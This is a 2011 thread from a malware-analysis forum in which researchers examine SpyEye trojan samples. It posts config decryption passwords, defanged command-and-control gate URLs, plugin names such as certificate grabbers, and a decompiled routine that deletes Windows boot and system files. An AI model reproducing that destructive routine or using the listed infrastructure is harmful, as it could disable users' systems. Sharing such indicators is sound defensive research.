A forum for reverse engineering, OS internals and malware analysis 

Trojan SpyEye (alias Pincav)

Forum for analysis and discussion about malware.

Re: Trojan SpyEye (alias Pincav)

 #7035  by EP_X0FF
 Sat Jul 02, 2011 5:29 pm
Pass for decrypted config: 6226E3D701DDFE6C674E187DD3A244A7

Gates:
hxxp://milloneti.net.in/wow/gate.php;90
hxxp://millonetibck.net.in/wow/gate.php;90
694 Kb of webinjects

Dropper, unpacked dropper, decrypted config in attach.

Dropper 12 /42 (28.6%)
http://www.virustotal.com/file-scan/rep ... 1309622526

Unpacked 25/ 42 (59.5%)
http://www.virustotal.com/file-scan/rep ... 1309626894
Attachments
pass: malware
(611.84 KiB) Downloaded 60 times

Re: Trojan SpyEye (alias Pincav)

 #7048  by EP_X0FF
 Sun Jul 03, 2011 9:03 am
SpyEye by 'mazafucker' edition.

v1.2.9x

Pass for decrypted config: FC5DFC3BE86D6753AB56776417840CCE

Gates:
hxxp://visitorcounterbck.net.in/images/gate.php
hxxp://visitorcounterback.net.in/images/gate.php
hxxp://secureprobebck.net.in/images/gate.php
Attachments
pass: malware
(117.6 KiB) Downloaded 58 times

Re: Trojan SpyEye (alias Pincav)

 #7102  by EP_X0FF
 Wed Jul 06, 2011 6:31 pm
markusg wrote:DA6F8B85830.exe
http://www.virustotal.com/file-scan/report.html?id=3714365d1482dea038ab2c1f5cdaff57df5bff18505fcf142e86f7788f830de0-1309962453
Sorry for late reply was busy copying 2tb of virtual machines.

Plugins:

ActiveAZ
Custom Connector
Certificates Grabber

Pass for decrypted config: A944CD075B64BA5716B8CED7AD41D4B8

Gates:
hxxp://yxatotato.com/gemoroi/gate.php;300
hxxp://murils.ru/pics/_about13/about.jpg.php;300
hxxp://kollapsborad.ru/lrrrrs/haze/clop.php;300
Unpacked dropper and decrypted config in attach.
Attachments
pass: malware
(298.94 KiB) Downloaded 61 times

Re: Trojan SpyEye (alias Pincav)

 #7104  by EP_X0FF
 Wed Jul 06, 2011 6:56 pm
markusg wrote:Recycle.Bin.exe
http://www.virustotal.com/file-scan/rep ... 1309977032
Pass for decrypted config: F318E70D252C8067D286E75113D95679

Fake gate entry (facebook.com)

Unpacked dropper and decrypted config in attach.
Attachments
pass: malware
(151.25 KiB) Downloaded 57 times

Re: Trojan SpyEye (alias Pincav)

 #7116  by EP_X0FF
 Thu Jul 07, 2011 6:16 pm
markusg wrote:DA6F8B8542A.exe
http://www.virustotal.com/file-scan/report.html?id=b99d1120e475ce4fbb06cef7ace320ddb4df218d250c09814c61371fc49e7b17-1310060626
SpyEye v1.3.x

Pass for decrypted config: A944CD075B64BA5716B8CED7AD41D4B8

Gates:
hxxp://yxatotato.com/gemoroi/gate.php;300
hxxp://murils.ru/pics/_about13/about.jpg.php;300
hxxp://kollapsborad.ru/lrrrrs/haze/clop.php;300
Unpacked dropper and decrypted config in attach. Similar to previous, recrypt.
Attachments
pass: malware
(311.11 KiB) Downloaded 54 times

Re: Trojan SpyEye (alias Pincav)

 #7131  by cronos713
 Fri Jul 08, 2011 5:22 am
Hi EP_X0FF, thank you very much for the information. I attach a sample with your .bin file. Can you check it this files?
Thanks!
Attachments
pass: infected
Thanks!
(270.27 KiB) Downloaded 45 times

Re: Trojan SpyEye (alias Pincav)

 #7132  by EP_X0FF
 Fri Jul 08, 2011 5:50 am
cronos713 wrote:Hi EP_X0FF, thank you very much for the information. I attach a sample with your .bin file. Can you check it this files?
Thanks!
SpyEye v1.3

Pass for decrypted config: B8861AB9ED87B79CC01DA26263373342

Plugins:

Socks5
Firefox Certificates Grabber
Custom Connector
And something trying to trash OS.
Code: Select all
signed int __cdecl Start()
{
  unsigned int v0; 
  const CHAR *v1; 
  LPCSTR lpExistingFileName; 
  int v4; 
  int v5; 
  int v6; 
  int v7; 
  int v8; 

  lpExistingFileName = "c:\\ntldr";
  v4 = (int)"c:\\ntdetect.com";
  v5 = (int)"c:\\bootmgr";
  v6 = (int)"c:\\loadmgr";
  v7 = (int)"c:\\windows\\explorer.exe";
  v8 = (int)"c:\\osloader.exe";
  v0 = 0;
  do
  {
    v1 = (&lpExistingFileName)[4 * v0];
    SetFileAttributesA((&lpExistingFileName)[4 * v0], 0x80u);
    DeleteFileA(v1);
    MoveFileExA(v1, "c:\\boots", 4u);
    ++v0;
  }
  while ( v0 < 6 );
  return 1;
}
An surprise? Quite primitive.

Gates:
hxxp://fas41245.com/rwq/gate.php;300
hxxp://f53151245.com/wew/gate.php;300
hxxp://a2535245.com/dsf/gate.php;300
hxxp://fc5623245.com/qwewqe/gate.php;300
hxxp://bdfdg2d.com/qtqwr/gate.php;300
hxxp://5321rdc.com/wqeq/gate.php;300
hxxp://asdaqr15.com/12er/gate.php;300
hxxp://fdgdfg233.com/qwrg/gate.php;300
hxxp://12412edaa.com/sadg/gate.php;300
hxxp://263rdasd.com/hfgf/gate.php;300
hxxp://634rfeds.com/fdgg/gate.php;300
hxxp://351rewad.com/gfdg/gate.php;300
hxxp://63fsdfas.com/ret/gate.php;300
hxxp://1241wdads.com/hdfh/gate.php;300
hxxp://21ewfsdaf.com/ytrr/gate.php;300
hxxp://qxxew2444.com/tret/gate.php;300
hxxp://124ffsaf.com/sadg/gate.php;300
hxxp://gasgasd.com/hfgf/gate.php;300
hxxp://gsagas25s.com/fdgg/gate.php;300
hxxp://3gqe5235d.com/gfdg/gate.php;300
hxxp://623t3fsd.com/ret/gate.php;300
hxxp://12235rfs.com/hdfh/gate.php;300
hxxp://21ew325fsa.com/ytrr/gate.php;300
hxxp://qxx32523rfs.com/tret/gate.php;300
hxxp://124125rfa.com/sadg/gate.php;300
hxxp://26325rf5.com/hfgf/gate.php;300
hxxp://63432rfg.com/fdgg/gate.php;300
hxxp://35325r3fgsd.com/gfdg/gate.php;300
hxxp://63f523rf.com/ret/gate.php;300
hxxp://1245232fs.com/hdfh/gate.php;300
hxxp://21253fss.com/ytrr/gate.php;300
hxxp://qxxe2353rfs.com/tret/gate.php;300
hxxp://15325rfse.com/sadg/gate.php;300
hxxp://35tfsgsdasd.com/hfgf/gate.php;300
hxxp://6325rfaseds.com/fdgg/gate.php;300
hxxp://332rfaswad.com/gfdg/gate.php;300
hxxp://63523rfasfas.com/ret/gate.php;300
hxxp://132532rfs.com/hdfh/gate.php;300
hxxp://21235fsaf.com/ytrr/gate.php;300
hxxp://325fs444.com/tret/gate.php;300
hxxp://124sdgs32.com/sadg/gate.php;300
hxxp://26325rfsd.com/hfgf/gate.php;300
hxxp://634sdgsd523s.com/fdgg/gate.php;300
hxxp://351r235fsef.com/gfdg/gate.php;300
hxxp://63fgsdt25.com/ret/gate.php;300
hxxp://124235rfs.com/1/gate.php;300
hxxp://21e23rfsdfsd.com/2/gate.php;300
hxxp://qx235rfs4.com/1/gate.php;300
hxxp://a2535245.com/dsf/gate.php;300
hxxp://fc5623245.com/qwewqe/gate.php;300
hxxp://bdfdg2d.com/qtqwr/gate.php;300
hxxp://5321rdc.com/wqeq/gate.php;300
hxxp://asdaqr15.com/12er/gate.php;300
hxxp://fdgdfg233.com/qwrg/gate.php;300
hxxp://12412edaa.com/sadg/gate.php;300
hxxp://263rdasd.com/hfgf/gate.php;300
hxxp://634rfeds.com/fdgg/gate.php;300
hxxp://351rewad.com/gfdg/gate.php;300
hxxp://f53151245.com/wew/gate.php;300
hxxp://63fsdfas.com/ret/gate.php;300
hxxp://1241wdads.com/hdfh/gate.php;300
hxxp://21ewfsdaf.com/ytrr/gate.php;300
hxxp://qxxew2444.com/tret/gate.php;300
hxxp://124ffsaf.com/sadg/gate.php;300
hxxp://gasgasd.com/hfgf/gate.php;300
hxxp://gsagas25s.com/fdgg/gate.php;300
hxxp://3gqe5235d.com/gfdg/gate.php;300
hxxp://623t3fsd.com/ret/gate.php;300
hxxp://12235rfs.com/hdfh/gate.php;300
hxxp://21ew325fsa.com/ytrr/gate.php;300
hxxp://qxx32523rfs.com/tret/gate.php;300
hxxp://124125rfa.com/sadg/gate.php;300
hxxp://26325rf5.com/hfgf/gate.php;300
hxxp://63432rfg.com/fdgg/gate.php;300
hxxp://35325r3fgsd.com/gfdg/gate.php;300
hxxp://63f523rf.com/ret/gate.php;300
hxxp://1245232fs.com/hdfh/gate.php;300
hxxp://21253fss.com/ytrr/gate.php;300
hxxp://qxxe2353rfs.com/tret/gate.php;300
hxxp://15325rfse.com/sadg/gate.php;300
hxxp://35tfsgsdasd.com/hfgf/gate.php;300
hxxp://6325rfaseds.com/fdgg/gate.php;300
hxxp://332rfaswad.com/gfdg/gate.php;300
hxxp://63523rfasfas.com/ret/gate.php;300
hxxp://132532rfs.com/hdfh/gate.php;300
hxxp://21235fsaf.com/ytrr/gate.php;300
hxxp://325fs444.com/tret/gate.php;300
hxxp://124sdgs32.com/sadg/gate.php;300
hxxp://26325rfsd.com/hfgf/gate.php;300
hxxp://634sdgsd523s.com/fdgg/gate.php;300
hxxp://351r235fsef.com/gfdg/gate.php;300
hxxp://63fgsdt25.com/ret/gate.php;300
hxxp://124235rfs.com/1/gate.php;300
hxxp://21e23rfsdfsd.com/2/gate.php;300
hxxp://qx235rfs4.com/1/gate.php;300
Unpacked dropper and decrypted config in attach.
Attachments
pass: malware
(256.47 KiB) Downloaded 69 times
  • 1
  • 18
  • 19
  • 20
  • 21
  • 22
  • 42
 Return to “Malware”